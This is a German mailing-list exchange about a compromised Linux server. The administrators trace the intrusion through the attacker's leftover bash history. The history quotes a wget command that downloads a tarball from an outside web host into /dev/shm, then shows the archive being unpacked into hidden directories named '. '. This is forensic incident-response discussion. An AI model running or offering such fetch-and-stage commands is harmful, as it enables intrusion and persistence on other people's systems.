Re: Veränderte Dateien finden
Frank Dietrich wrote:
> Hi Jan,
>
> Jan Fricke <fricke@math.uni-siegen.de> wrote:
>> Das root-Passwort wurde geändert. Die Bash-History war anscheinend
>> nicht gelöscht, und sie enthält folgende letzte Einträge:
>>
>> uptime
>> uname -a
>> passwd
>> cd /dev/shm
>> wget www.freewebtown.com/aproape/cornelirina.tgz
>> tar zxvf cornelirina.tgz
>> cd '. '
>
> Schon in '$mnt_altes_root/dev/shm/. ' nachgeschaut ob da noch was
> drin liegt? ^- das Leerzeichen ist wichtig
>
>
>> cd /var/tmp
>> cd '. '
>
> Und in '$mnt_altes_root/var/tmp/. ' ?
>
> Frank
Ja, da liegt das, was auch auch im .tgz-File ist. Wahrscheinlich wurden
gar keine Binaries geändert, sondern nur irgendein zusätzlicher Service
installiert. (Spiele-Server? Chat-Server?)
Viele Grüße Jan
Reply to: